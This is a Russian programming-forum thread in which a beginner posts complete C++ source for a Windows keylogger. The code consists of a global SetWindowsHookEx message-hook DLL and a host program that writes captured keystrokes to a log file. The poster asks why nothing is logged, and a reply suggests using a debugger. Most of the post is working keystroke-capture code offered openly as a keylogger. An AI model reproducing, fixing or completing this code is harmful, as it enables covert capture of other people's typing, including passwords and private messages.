Форум программистов, компьютерный форум, киберфорум
C/C++: WinAPI
Войти
Регистрация
Восстановить пароль
Блоги Сообщество Поиск Заказать работу  
 
Рейтинг 4.80/5: Рейтинг темы: голосов - 5, средняя оценка - 4.80
 Аватар для serjio3077
2 / 2 / 1
Регистрация: 31.07.2013
Сообщений: 27

Кейлоггер не работает в Windows7

20.10.2014, 12:10. Показов 1116. Ответов 2
Метки нет (Все метки)

Студворк — интернет-сервис помощи студентам
Опишу суть: Вот такой чудо кейлоггер собрал по кусочкам на просторах инета. Вроде и компилится без ошибок. Прога стартует. И даже создаёт лог файл. Проблема только в том что она в этот лог ничего не пишет. Вотс ап?
И призываю вас гуру и тёмные силы постсоветского кодинга - не ругайте матом. Я крайней степени новичок.
Листинг прилагаю

Кликните здесь для просмотра всего текста

C++
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
#include "MyHookDll.h"
 
// Глобальные переменные
HINSTANCE hInstance = NULL; // The instance of the DLL
 
// Описание нашей хук-функци
LRESULT CALLBACK KeyboardMsgProc ( int, WPARAM, LPARAM );
 
#pragma data_seg(".SData")
HHOOK hMsgHook = NULL; // Handle нашего хука
UINT KBoardMessage = NULL; // Сообщение, которое мы будем посылать
                           // родительскому приложению
HWND hParentWnd = NULL; // Окно родительского приложения
#pragma data_seg( )
 
//Директива линкеру создать разделяемую(shared) секцию с атрибутами RWS
#pragma comment(linker,"/SECTION:.SData,RWS")
 
// Далее, обычная DllMain
BOOL APIENTRY DllMain( HANDLE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
{
    if (ul_reason_for_call == DLL_PROCESS_ATTACH)
        hInstance = (HINSTANCE)hModule;
    return TRUE;
}
 
// Две функции SetHook и UnsetHook
 
MYHOOKDLL_API int SetHook (HWND hWnd, // window which 
                    // should receive notification messages
        UINT UpdateMsg) // notification message
{
    if (hWnd == NULL) return -1;
    
    // Save received parameters
    hParentWnd = hWnd;
    KBoardMessage = UpdateMsg;
    
    // Set hook
    hMsgHook= ::SetWindowsHookEx (WH_GETMESSAGE, KeyboardMsgProc, hInstance, 0);
    
    // If we are failed...
    if (hMsgHook == NULL)
        return -1;
        
    return 0;
};
 
MYHOOKDLL_API int UnSetHook()
{
    UnhookWindowsHookEx (hMsgHook);
    
    hMsgHook = NULL;
    
    return 0;
};
 
 
// И сама callback функция хука
 
LRESULT CALLBACK KeyboardMsgProc (int code, WPARAM wParam, LPARAM lParam)
{
    if (code >= 0)
    {
        MSG * msg = (MSG * )lParam;
 
        if ((lParam)
            &&(msg->message == WM_CHAR)
            &&(wParam == PM_REMOVE))
    
            PostMessage (hParentWnd, KBoardMessage, msg->wParam, 0 );
    }
 
    return CallNextHookEx (hMsgHook, code ,wParam , lParam);
};

C++
1
2
3
4
5
6
7
8
9
#define MYHOOKDLL_API __declspec(dllexport)
 
#include <windows.h>
 
extern "C"
{
    MYHOOKDLL_API int  SetHook( HWND,UINT );
    MYHOOKDLL_API int  UnSetHook();
}
C++
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
#include <windows.h>
#include <stdio.h>
// Функция окна
LRESULT CALLBACK LogWndProc(HWND, UINT, UINT, LONG);
// Сообщение, которое мы будем получать от хука
#define WM_HOOKMESSAGE WM_USER+1
// Глобальные пременные
HWND hWnd; // Главное окно приложения
HINSTANCE hDllInst; // Dll с хуком
// И две функции
int ( * SetHook)( HWND,UINT);
int (* UnSetHook)();
// Вход в программу
int APIENTRY WinMain(HINSTANCE hInstance,
        HINSTANCE hPrevInstance,
        LPSTR lpCmdLine,
        int nCmdShow)
{
    MSG msg;
    WNDCLASS wc;
 
    // Класс и окно которое будет получать уведомление о нажатиях клавиш.
    memset (&wc, 0, sizeof (wc));
    wc.lpszClassName = "__MyKeyLogger";
    wc.hInstance = hInstance;
    wc.lpfnWndProc = LogWndProc;
    wc.style = CS_HREDRAW | CS_VREDRAW ;
    wc.hbrBackground = (HBRUSH)(COLOR_MENU+1);
    wc.hCursor = LoadCursor(NULL, IDC_ARROW);
 
    RegisterClass(&wc);
 
    hWnd = ::CreateWindowEx (0,
        "__MyKeyLogger",
        "My KeyLogger",
        WS_POPUP |WS_VISIBLE | WS_CAPTION | WS_SYSMENU |WS_THICKFRAME ,
        0, 0, 200, 200,
        NULL,
        NULL,
        hInstance,
        0);
 
    // Подгружаем dll
    hDllInst = LoadLibrary((LPCTSTR) "myhookdll.dll");
 
    if (hDllInst)
    {
        SetHook = (int ( *)(HWND, UINT ))GetProcAddress(hDllInst,"SetHook");
        UnSetHook = (int ( *)( ))GetProcAddress(hDllInst, "UnSetHook");
    }
 
    // Устанавливаем хук
    if(SetHook)SetHook(hWnd, WM_HOOKMESSAGE);
 
    // Цикл сообщений
    while (GetMessage(&msg, NULL, 0, 0))
    {
        DispatchMessage(&msg);
    }
 
    // Снимаем хук
    if(UnSetHook)UnSetHook();
 
    if (IsWindow(hWnd ))
        DestroyWindow (hWnd );
 
    // Выгружаем dll
    if (hDllInst) FreeLibrary(hDllInst);
    // Выход
    return 0;
}
 
// Функция окна
// В ней основной пункт - обработка нашего сообщения
LRESULT CALLBACK LogWndProc(HWND hwnd, UINT Message, UINT wParam, LONG lParam)
{
    FILE * f = fopen("a.log","a");
 
    switch (Message)
    {
    case WM_CLOSE:
        DestroyWindow(hwnd);
        break;
 
    case WM_HOOKMESSAGE:
        switch(wParam)
        {
        // для некоторых символов выведем их "название"
        case 0x08: fprintf(f,"<BkSp>");break;
        case 0x1b: fprintf(f,"<Esc>");break;
        case 0x0d: fprintf(f,"\n");break;
        default:
            fprintf(f,"%c",wParam );
        }
        break;
 
    case WM_DESTROY:
    case WM_ENDSESSION:
        PostQuitMessage (0);
        break;
    }
 
    fclose(f);
    return DefWindowProc(hwnd,Message,wParam,lParam);
}
0
Programming
Эксперт
39485 / 9562 / 3019
Регистрация: 12.04.2006
Сообщений: 41,671
Блог
20.10.2014, 12:10
Ответы с готовыми решениями:

На другом компьютере не работает кейлоггер
Здравствуйте. У меня такая проблема: есть 2 кейлоггера с dll (хотя пробовала и переписать функции в основную программу, ничего не...

Не работает 5.1 под Windows7
Здравствуйте, коллеги! Поменял операционку с ХР на семерку - перестали работать колонки 5.1. При тесте работают максимум 4 колонки,...

Не работает звук в Windows7
Возможно, такая тема уже была, но честно - не найду. Взял ноутбук Тошиба с Windows7. Раньше на Асере с ХР звук работал без проблем....

2
Заблокирован
20.10.2014, 12:18
У вас код построен так что если есть ошибка то программа работает дальше и ни как об этом не сообщает.
Попробуйте пройтись отладчиком по основной программе и посмотреть все ли дескрипторы определяются, нет ли нулевых указателей.
0
 Аватар для serjio3077
2 / 2 / 1
Регистрация: 31.07.2013
Сообщений: 27
20.10.2014, 13:02  [ТС]
Мне бы как нибудь для тупых.......как это сделать? Я просто C++ начал изучать грубо говоря завтра.
0
Надоела реклама? Зарегистрируйтесь и она исчезнет полностью.
inter-admin
Эксперт
29715 / 6470 / 2152
Регистрация: 06.03.2009
Сообщений: 28,500
Блог
20.10.2014, 13:02
Помогаю со студенческими работами здесь

Компилю на Windows7 и не работает на XP
У меня проблемка с переносом программки. Что делать? Надо программу переводить на статическое включение библиотек? Если да, то как это...

Функция GetAsyncKeyState() не работает в Windows7
Вот код, отлично работает на XP: Public Shared Function GetAsyncKeyState(ByVal vKey As System.Windows.Forms.Keys) As Integer ... ...

Некорректно работает звук на Windows7
Приветствия. Помогите, пожалуйста, справиться с проблемой. После установки Windows7 перестал воспроизводиться звук на всех колонках...

QTcpServer - не работает 80-й порт. (Windows7)
Ребят, вот тут продолжаю биться с QTcpSever-ом.... Если начинать слушать 80-й порт listen(QHostAddress::Any, 80), инкаминк конекшен не...

Не запускается windows7. Ubuntu работает
У меня вот точно такая же ошибка высвечивается ( https://www.cyberforum.ru/windows7/thread661090.html ), ноут lenovo G560,только у меня...


Искать еще темы с ответами

Или воспользуйтесь поиском по форуму:
3
Ответ Создать тему
Новые блоги и статьи
Автозаполнение реквизита при выборе элемента справочника
Maks 27.03.2026
Программный код из решения ниже на примере нетипового документа "ЗаявкаНаРемонтСпецтехники" разработанного в конфигурации КА2. При выборе "Спецтехники" (Тип Справочник. Спецтехника), заполняется. . .
Сумматор с применением элементов трёх состояний.
Hrethgir 26.03.2026
Тут. https:/ / fips. ru/ EGD/ ab3c85c8-836d-4866-871b-c2f0c5d77fbc Первый документ красиво выглядит, но без схемы. Это конечно не даёт никаких плюсов автору, но тем не менее. . . всё может быть. . .
Автозаполнение реквизитов при создании документа
Maks 26.03.2026
Программный код из решения ниже размещается в модуле объекта документа, в процедуре "ПриСозданииНаСервере". Алгоритм проверки заполнения реализован для исключения перезаписи значения реквизита,. . .
Команды формы и диалоговое окно
Maks 26.03.2026
1. Команда формы "ЗаполнитьЗапчасти". Программный код из решения ниже на примере нетипового документа "ЗаявкаНаРемонтСпецтехники" разработанного в конфигурации КА2. В качестве источника данных. . .
Кому нужен AOT?
DevAlt 26.03.2026
Решил сделать простой ланчер Написал заготовку: dotnet new console --aot -o UrlHandler var items = args. Split(":"); var tag = items; var id = items; var executable = args;. . .
Отправка уведомления на почту при изменении наименования справочника
Maks 24.03.2026
Программная отправка письма электронной почты на примере изменения наименования типового справочника "Склады" в конфигурации БП3. Перед реализацией необходимо выполнить настройку системной учетной. . .
модель ЗдравоСохранения 5. Меньше увольнений- больше дохода!
anaschu 24.03.2026
Теперь система здравосохранения уменьшает количество увольнений. 9TO2GP2bpX4 a42b81fb172ffc12ca589c7898261ccb/ https:/ / rutube. ru/ video/ a42b81fb172ffc12ca589c7898261ccb/ Слева синяя линия -. . .
Midnight Chicago Blues
kumehtar 24.03.2026
Такой Midnight Chicago Blues, знаешь?. . Когда вечерние улицы становятся ночными, а ты не можешь уснуть. Ты идёшь в любимый старый бар, и бармен наливает тебе виски. Ты смотришь на пролетающие. . .
КиберФорум - форум программистов, компьютерный форум, программирование
Powered by vBulletin
Copyright ©2000 - 2026, CyberForum.ru